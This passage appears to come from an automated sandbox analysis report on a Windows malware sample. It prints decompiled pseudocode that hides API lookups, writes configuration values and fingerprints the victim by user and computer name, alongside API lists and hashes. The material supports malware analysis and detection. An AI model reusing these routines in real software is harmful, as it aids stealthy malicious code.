					_t2 = _t26 + 0xa9e782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00A953BB(_t54);
					} else {
						_t30 =  *0xa9d2e0; // 0x453a5a8
						_t5 = _t30 + 0xa9e76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xa9d2e0; // 0x453a5a8
							_t7 = _t33 + 0xa9e4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xa9d2e0; // 0x453a5a8
								_t9 = _t36 + 0xa9e406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xa9d2e0; // 0x453a5a8
									_t11 = _t39 + 0xa9e792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00A95C55(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                                                                                                                                                                                                0x00a96865
                                                                                                                                                                                                                                0x00a96869
                                                                                                                                                                                                                                0x00a9692b
                                                                                                                                                                                                                                0x00a9686f
                                                                                                                                                                                                                                0x00a9686f
                                                                                                                                                                                                                                0x00a96874
                                                                                                                                                                                                                                0x00a96887
                                                                                                                                                                                                                                0x00a96889
                                                                                                                                                                                                                                0x00a9688e
                                                                                                                                                                                                                                0x00a96896
                                                                                                                                                                                                                                0x00a9689d
                                                                                                                                                                                                                                0x00a9689f
                                                                                                                                                                                                                                0x00a968a4
                                                                                                                                                                                                                                0x00a96923
                                                                                                                                                                                                                                0x00a96924
                                                                                                                                                                                                                                0x00a968a6
                                                                                                                                                                                                                                0x00a968a6
                                                                                                                                                                                                                                0x00a968ab
                                                                                                                                                                                                                                0x00a968b3
                                                                                                                                                                                                                                0x00a968b5
                                                                                                                                                                                                                                0x00a968ba
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a968bc
                                                                                                                                                                                                                                0x00a968bc
                                                                                                                                                                                                                                0x00a968c1
                                                                                                                                                                                                                                0x00a968c9
                                                                                                                                                                                                                                0x00a968cb
                                                                                                                                                                                                                                0x00a968d0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a968d2
                                                                                                                                                                                                                                0x00a968d2
                                                                                                                                                                                                                                0x00a968d7
                                                                                                                                                                                                                                0x00a968df
                                                                                                                                                                                                                                0x00a968e1
                                                                                                                                                                                                                                0x00a968e6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a968e8
                                                                                                                                                                                                                                0x00a968e8
                                                                                                                                                                                                                                0x00a968ed
                                                                                                                                                                                                                                0x00a968f5
                                                                                                                                                                                                                                0x00a968f7
                                                                                                                                                                                                                                0x00a968fc
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a968fe
                                                                                                                                                                                                                                0x00a96904
                                                                                                                                                                                                                                0x00a96909
                                                                                                                                                                                                                                0x00a96910
                                                                                                                                                                                                                                0x00a96915
                                                                                                                                                                                                                                0x00a9691a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9691c
                                                                                                                                                                                                                                0x00a9691f
                                                                                                                                                                                                                                0x00a9691f
                                                                                                                                                                                                                                0x00a9691a
                                                                                                                                                                                                                                0x00a968fc
                                                                                                                                                                                                                                0x00a968e6
                                                                                                                                                                                                                                0x00a968d0
                                                                                                                                                                                                                                0x00a968ba
                                                                                                                                                                                                                                0x00a968a4
                                                                                                                                                                                                                                0x00a96939

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00A974C1,?,00000001,?,?,00000000,00000000), ref: 00A9687B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A9689D
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A968B3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A968C9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A968DF
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A968F5
                                                                                                                                                                                                                                  • Part of subcall function 00A95C55: memset.NTDLL ref: 00A95CD4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1886625739-0
                                                                                                                                                                                                                                • Opcode ID: b9b8a30dccbc6c8bb5a9488e8939c46e43d3f21e77318dbbb93197b004c78c74
                                                                                                                                                                                                                                • Instruction ID: 186257dcb2eeb738320e60338f191f8c9483f422970a10293c6e7c7e55f158da
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9b8a30dccbc6c8bb5a9488e8939c46e43d3f21e77318dbbb93197b004c78c74
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F211BB5B0060AAFDB11DFA9DD84EAABBFCEF043547014466E546C7211EB70E906CBB0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A94847, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                			E00A94847(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0xa9d37c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00A93037( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E00A92B5D(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E00A953BB(_a8);
						goto L29;
					}
					_t64 =  *0xa9d2b0; // 0x4fd9bb8
					_t16 = _t64 + 0xc; // 0x4fd9c86
					_t65 = E00A93037(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00a9c0
						if(E00A99BAF(_t97,  *_t33, _t91, _a8,  *0xa9d374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0xa9d2e0; // 0x453a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0xa9ea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0xa9ea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E00A95E8A(_t69,  *0xa9d374,  *0xa9d378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xa9d2e0; // 0x453a5a8
									_t44 = _t71 + 0xa9e83e; // 0x74666f53
									_t73 = E00A93037(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00a9c0
										E00A99BED( *_t47, _t91, _a8,  *0xa9d378, _a24);
										_t49 = _t101 + 0x10; // 0x3d00a9c0
										E00A99BED( *_t49, _t91, _t99,  *0xa9d370, _a16);
										E00A953BB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00a9c0
									E00A99BED( *_t40, _t91, _a8,  *0xa9d378, _a24);
									_t43 = _t101 + 0x10; // 0x3d00a9c0
									E00A99BED( *_t43, _t91, _a8,  *0xa9d370, _a16);
								}
								if( *_t101 != 0) {
									E00A953BB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00a9c0
					_t81 = E00A963D1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00a9c0
							E00A99BAF(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00A953BB(_t100);
						_t98 = _a16;
					}
					E00A953BB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00A9A929(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xa9d37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                                                                                                                                                                                                0x00a94847
                                                                                                                                                                                                                                0x00a94850
                                                                                                                                                                                                                                0x00a94857
                                                                                                                                                                                                                                0x00a9485c
                                                                                                                                                                                                                                0x00a948c9
                                                                                                                                                                                                                                0x00a948cf
                                                                                                                                                                                                                                0x00a948d4
                                                                                                                                                                                                                                0x00a948db
                                                                                                                                                                                                                                0x00a948e0
                                                                                                                                                                                                                                0x00a948e5
                                                                                                                                                                                                                                0x00a94a50
                                                                                                                                                                                                                                0x00a94a57
                                                                                                                                                                                                                                0x00a94a57
                                                                                                                                                                                                                                0x00a94a5c
                                                                                                                                                                                                                                0x00a94a5e
                                                                                                                                                                                                                                0x00a94a5e
                                                                                                                                                                                                                                0x00a94a67
                                                                                                                                                                                                                                0x00a94a67
                                                                                                                                                                                                                                0x00a948eb
                                                                                                                                                                                                                                0x00a948f7
                                                                                                                                                                                                                                0x00a94a46
                                                                                                                                                                                                                                0x00a94a49
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94a49
                                                                                                                                                                                                                                0x00a948fd
                                                                                                                                                                                                                                0x00a94902
                                                                                                                                                                                                                                0x00a94905
                                                                                                                                                                                                                                0x00a9490a
                                                                                                                                                                                                                                0x00a9490f
                                                                                                                                                                                                                                0x00a94958
                                                                                                                                                                                                                                0x00a94958
                                                                                                                                                                                                                                0x00a9496b
                                                                                                                                                                                                                                0x00a94975
                                                                                                                                                                                                                                0x00a9497b
                                                                                                                                                                                                                                0x00a94982
                                                                                                                                                                                                                                0x00a9498c
                                                                                                                                                                                                                                0x00a9498c
                                                                                                                                                                                                                                0x00a94984
                                                                                                                                                                                                                                0x00a94984
                                                                                                                                                                                                                                0x00a94984
                                                                                                                                                                                                                                0x00a94984
                                                                                                                                                                                                                                0x00a949ae
                                                                                                                                                                                                                                0x00a949b6
                                                                                                                                                                                                                                0x00a949e4
                                                                                                                                                                                                                                0x00a949e9
                                                                                                                                                                                                                                0x00a949f0
                                                                                                                                                                                                                                0x00a949f5
                                                                                                                                                                                                                                0x00a949f9
                                                                                                                                                                                                                                0x00a94a2b
                                                                                                                                                                                                                                0x00a949fb
                                                                                                                                                                                                                                0x00a94a08
                                                                                                                                                                                                                                0x00a94a0b
                                                                                                                                                                                                                                0x00a94a1b
                                                                                                                                                                                                                                0x00a94a1e
                                                                                                                                                                                                                                0x00a94a24
                                                                                                                                                                                                                                0x00a94a24
                                                                                                                                                                                                                                0x00a949b8
                                                                                                                                                                                                                                0x00a949c5
                                                                                                                                                                                                                                0x00a949c8
                                                                                                                                                                                                                                0x00a949da
                                                                                                                                                                                                                                0x00a949dd
                                                                                                                                                                                                                                0x00a949dd
                                                                                                                                                                                                                                0x00a94a35
                                                                                                                                                                                                                                0x00a94a41
                                                                                                                                                                                                                                0x00a94a37
                                                                                                                                                                                                                                0x00a94a3a
                                                                                                                                                                                                                                0x00a94a3a
                                                                                                                                                                                                                                0x00a94a35
                                                                                                                                                                                                                                0x00a949ae
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94975
                                                                                                                                                                                                                                0x00a9491e
                                                                                                                                                                                                                                0x00a94921
                                                                                                                                                                                                                                0x00a94928
                                                                                                                                                                                                                                0x00a9492e
                                                                                                                                                                                                                                0x00a94931
                                                                                                                                                                                                                                0x00a94933
                                                                                                                                                                                                                                0x00a9493f
                                                                                                                                                                                                                                0x00a94942
                                                                                                                                                                                                                                0x00a94942
                                                                                                                                                                                                                                0x00a94948
                                                                                                                                                                                                                                0x00a9494d
                                                                                                                                                                                                                                0x00a9494d
                                                                                                                                                                                                                                0x00a94953
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94953
                                                                                                                                                                                                                                0x00a94861
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a94888
                                                                                                                                                                                                                                0x00a94888
                                                                                                                                                                                                                                0x00a94894
                                                                                                                                                                                                                                0x00a948a7
                                                                                                                                                                                                                                0x00a948ad
                                                                                                                                                                                                                                0x00a948b5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a948b5

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(00A951FC,0000005F,00000000,00000000,00000104), ref: 00A9487A
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 00A948A7
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: lstrlen.KERNEL32(?,00000000,04FD9BB8,00000000,00A96F37,04FD9D96,?,?,?,?,?,69B25F44,00000005,00A9D00C), ref: 00A9303E
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: mbstowcs.NTDLL ref: 00A93067
                                                                                                                                                                                                                                  • Part of subcall function 00A93037: memset.NTDLL ref: 00A93079
                                                                                                                                                                                                                                  • Part of subcall function 00A99BED: lstrlenW.KERNEL32(?,?,?,00A94A10,3D00A9C0,80000002,00A951FC,00A92DE9,74666F53,4D4C4B48,00A92DE9,?,3D00A9C0,80000002,00A951FC,?), ref: 00A99C12
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00A948C9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                                                                                                                • String ID: ($\
                                                                                                                                                                                                                                • API String ID: 3924217599-1512714803
                                                                                                                                                                                                                                • Opcode ID: f0ede71a3e9877f702294af9e1caf80ade7e613dbfba7fc95d5b5e0a3d923191
                                                                                                                                                                                                                                • Instruction ID: 3dab7ba27c5f4ce82ca6676a9928b229c7258665757965556e618d677688ec63
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0ede71a3e9877f702294af9e1caf80ade7e613dbfba7fc95d5b5e0a3d923191
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1351687220060AAFDF12DFA4DE41EAB37F9BB08344F108519FA1596521EB36DA669B10
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A61D65, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A61D65() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0xa641b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0xa641bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0xa641ac = _t3;
						_t5 = GetCurrentProcessId();
						 *0xa641a8 = _t5;
						 *0xa641b0 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0xa641a4 = _t6;
						if(_t6 == 0) {
							 *0xa641a4 =  *0xa641a4 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                                                                                                                                                                                                                0x00a61d66
                                                                                                                                                                                                                                0x00a61d74
                                                                                                                                                                                                                                0x00a61d7a
                                                                                                                                                                                                                                0x00a61d81
                                                                                                                                                                                                                                0x00a61dd8
                                                                                                                                                                                                                                0x00a61dd8
                                                                                                                                                                                                                                0x00a61d83
                                                                                                                                                                                                                                0x00a61d8b
                                                                                                                                                                                                                                0x00a61d98
                                                                                                                                                                                                                                0x00a61d98
                                                                                                                                                                                                                                0x00a61dd4
                                                                                                                                                                                                                                0x00a61dd6
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61d8d
                                                                                                                                                                                                                                0x00a61d94
                                                                                                                                                                                                                                0x00a61d9a
                                                                                                                                                                                                                                0x00a61d9a
                                                                                                                                                                                                                                0x00a61d9f
                                                                                                                                                                                                                                0x00a61dad
                                                                                                                                                                                                                                0x00a61db2
                                                                                                                                                                                                                                0x00a61db8
                                                                                                                                                                                                                                0x00a61dbe
                                                                                                                                                                                                                                0x00a61dc5
                                                                                                                                                                                                                                0x00a61dc7
                                                                                                                                                                                                                                0x00a61dc7
                                                                                                                                                                                                                                0x00a61dd1
                                                                                                                                                                                                                                0x00a61d96
                                                                                                                                                                                                                                0x00a61d96
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61d96
                                                                                                                                                                                                                                0x00a61d94

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A61577), ref: 00A61D74
                                                                                                                                                                                                                                • GetVersion.KERNEL32 ref: 00A61D83
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00A61D9F
                                                                                                                                                                                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00A61DB8
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 845504543-1084903527
                                                                                                                                                                                                                                • Opcode ID: 77cf256ab50466190469c0a084a28c227d81d0e3bb979450855f53bfe81c0638
                                                                                                                                                                                                                                • Instruction ID: 59971e6be7642c98a3e51879939be84e74ca8b16dd47568e1a2e484ae7de98d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77cf256ab50466190469c0a084a28c227d81d0e3bb979450855f53bfe81c0638
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38F03C72A44301EBEB10DBE9BC057553FB4E71B711F054625E605D61E0E7F085C78B54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A97095, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E00A97095() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xa9d364; // 0x4fd95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xa9d364; // 0x4fd95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xa9d364; // 0x4fd95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xa9e823) {
					HeapFree( *0xa9d270, 0, _t10);
					_t7 =  *0xa9d364; // 0x4fd95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                                                                                                                                                                                                0x00a97095
                                                                                                                                                                                                                                0x00a9709e
                                                                                                                                                                                                                                0x00a970ae
                                                                                                                                                                                                                                0x00a970ae
                                                                                                                                                                                                                                0x00a970b3
                                                                                                                                                                                                                                0x00a970b8
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a970a8
                                                                                                                                                                                                                                0x00a970a8
                                                                                                                                                                                                                                0x00a970ba
                                                                                                                                                                                                                                0x00a970bf
                                                                                                                                                                                                                                0x00a970c3
                                                                                                                                                                                                                                0x00a970d6
                                                                                                                                                                                                                                0x00a970dc
                                                                                                                                                                                                                                0x00a970dc
                                                                                                                                                                                                                                0x00a970e5
                                                                                                                                                                                                                                0x00a970e7
                                                                                                                                                                                                                                0x00a970eb
                                                                                                                                                                                                                                0x00a970f1

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(04FD9570), ref: 00A9709E
                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,00A95884), ref: 00A970A8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,00A95884), ref: 00A970D6
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(04FD9570), ref: 00A970EB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 58946197-1536154274
                                                                                                                                                                                                                                • Opcode ID: 0798a2784f97cda46f309be732723d525485e1256fd07a86c9cc370140ed96eb
                                                                                                                                                                                                                                • Instruction ID: 1e4bfc705640dd12d0c9e1ee1a34db3a407038ecc4d6d65cdeb36851cdc3e10f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0798a2784f97cda46f309be732723d525485e1256fd07a86c9cc370140ed96eb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BF0D4B4718200DFEF18CBE4EE9AF1A37E4BB05711F44401AE502CB360CB30AC82DA21
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A96706, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A96706() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E00A95157(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E00A953BB(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0xa9a626
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                                                                                                                                                                                                0x00a96714
                                                                                                                                                                                                                                0x00a96717
                                                                                                                                                                                                                                0x00a9671a
                                                                                                                                                                                                                                0x00a96720
                                                                                                                                                                                                                                0x00a96725
                                                                                                                                                                                                                                0x00a9672b
                                                                                                                                                                                                                                0x00a96733
                                                                                                                                                                                                                                0x00a96736
                                                                                                                                                                                                                                0x00a9673c
                                                                                                                                                                                                                                0x00a96741
                                                                                                                                                                                                                                0x00a9674e
                                                                                                                                                                                                                                0x00a9675b
                                                                                                                                                                                                                                0x00a9675f
                                                                                                                                                                                                                                0x00a96761
                                                                                                                                                                                                                                0x00a96765
                                                                                                                                                                                                                                0x00a96768
                                                                                                                                                                                                                                0x00a96778
                                                                                                                                                                                                                                0x00a967cb
                                                                                                                                                                                                                                0x00a967cc
                                                                                                                                                                                                                                0x00a9677a
                                                                                                                                                                                                                                0x00a9677f
                                                                                                                                                                                                                                0x00a96780
                                                                                                                                                                                                                                0x00a96785
                                                                                                                                                                                                                                0x00a96788
                                                                                                                                                                                                                                0x00a9679b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a9679d
                                                                                                                                                                                                                                0x00a967a0
                                                                                                                                                                                                                                0x00a967a5
                                                                                                                                                                                                                                0x00a967b3
                                                                                                                                                                                                                                0x00a967b6
                                                                                                                                                                                                                                0x00a967bc
                                                                                                                                                                                                                                0x00a967c1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a967c3
                                                                                                                                                                                                                                0x00a967c3
                                                                                                                                                                                                                                0x00a967c6
                                                                                                                                                                                                                                0x00a967c6
                                                                                                                                                                                                                                0x00a967c1
                                                                                                                                                                                                                                0x00a9679b
                                                                                                                                                                                                                                0x00a967d1
                                                                                                                                                                                                                                0x00a967d2
                                                                                                                                                                                                                                0x00a96741
                                                                                                                                                                                                                                0x00a967d8

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,00A9A624), ref: 00A9671A
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00A9A624), ref: 00A96736
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,00A9A624), ref: 00A96770
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00A9A624,?), ref: 00A96793
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00A9A624,00000000,00A9A626,00000000,00000000,?,?,00A9A624), ref: 00A967B6
